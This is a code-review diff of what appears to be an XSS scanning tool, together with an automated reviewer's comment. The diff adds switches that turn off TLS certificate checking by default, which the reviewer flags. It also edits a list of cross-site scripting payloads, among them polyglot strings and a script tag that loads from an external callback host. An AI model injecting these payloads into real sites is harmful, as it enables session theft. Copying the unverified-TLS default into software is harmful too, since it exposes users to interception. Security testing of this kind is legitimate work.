| skipped 208 lines |
209 | 209 | | if not os.path.isfile(_phantom): |
210 | 210 | | parser.error( 'phantomjs not found!' ) |
211 | 211 | | # _phantom_cmd = _phantom + ' ' + os.path.dirname(os.path.realpath(__file__)) + '/phantom-xss.js' |
212 | | - | _phantom_cmd = _phantom + ' --load-images=false ' + os.path.dirname(os.path.realpath(__file__)) + '/phantom-xss.js' |
| 212 | + | _phantom_cmd = _phantom + ' --ignore-ssl-errors=true --ssl-protocol=any --load-images=false ' + os.path.dirname(os.path.realpath(__file__)) + '/phantom-xss.js' |
213 | 213 | | # _phantom_cmd = _phantom + ' ' + os.path.dirname(os.path.realpath(__file__)) + '/puppeteer-xss.js' |
214 | 214 | | # print( _phantom_cmd ) |
215 | 215 | | |
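Review bot: The added `--ignore-ssl-errors=true --ssl-protocol=any` on new line 212 turns off certificate validation and any minimum TLS version for every run, with no command-line way to restore it. Because the headless browser then loads and executes whatever the unauthenticated connection returns, this should be an explicit opt-in rather than the default: add an option on the `parser` visible at line 210, e.g. `parser.add_argument('--insecure', action='store_true', help='accept invalid TLS certificates (disables verification)')`, and only append the two switches to `_phantom_cmd` when it is set, leaving `--load-images=false` unconditional. The command is also assembled by string concatenation, so a script directory containing a space would break the path; how `_phantom_cmd` is consumed is outside this hunk, but if it is handed to a shell, passing a list of arguments would be safer.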
| skipped 80 lines |
296 | 296 | | # source: https://twitter.com/brutelogic/status/1138805808328839170 |
297 | 297 | | if not n_payloads: |
298 | 298 | | t_payloads = [ |
299 | | - | '\'"--><sVg onload=prompt(1)>', |
300 | 299 | | '\'"--><a autofocus onfocus=prompt(1) href=?>.', |
301 | 300 | | '\'"--></sCrIpt><sCRIpt>prompt(1)</SCript>', |
302 | 301 | | '\'"--><svG><scRIpt href=data:,prompt(1) />', |
| skipped 2 lines |
305 | 304 | | "'\")];*/prompt(1);/*", |
306 | 305 | | '" onload=prompt(1)>', |
307 | 306 | | '\'"--><SCripT src="//glc.xss.ht">', |
| 307 | + | '\'"--><SCripT src=https://glc.xss.ht>', |
308 | 308 | | '\'"--><sCRipt src=javascript:[1].find(prompt)>', |
309 | | - | "'\"--><x v-on=_c.constructor('prompt(1)')()>", |
| 309 | + | "'\"--><sVg/OnLuFy=\"X=y\"oNloaD=;1^confirm(1)>/``^1//", |
| 310 | + | "javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'>", |
310 | 311 | | ] |
311 | 312 | | n_payloads = len(t_payloads) |
312 | 313 | | |
| skipped 99 lines |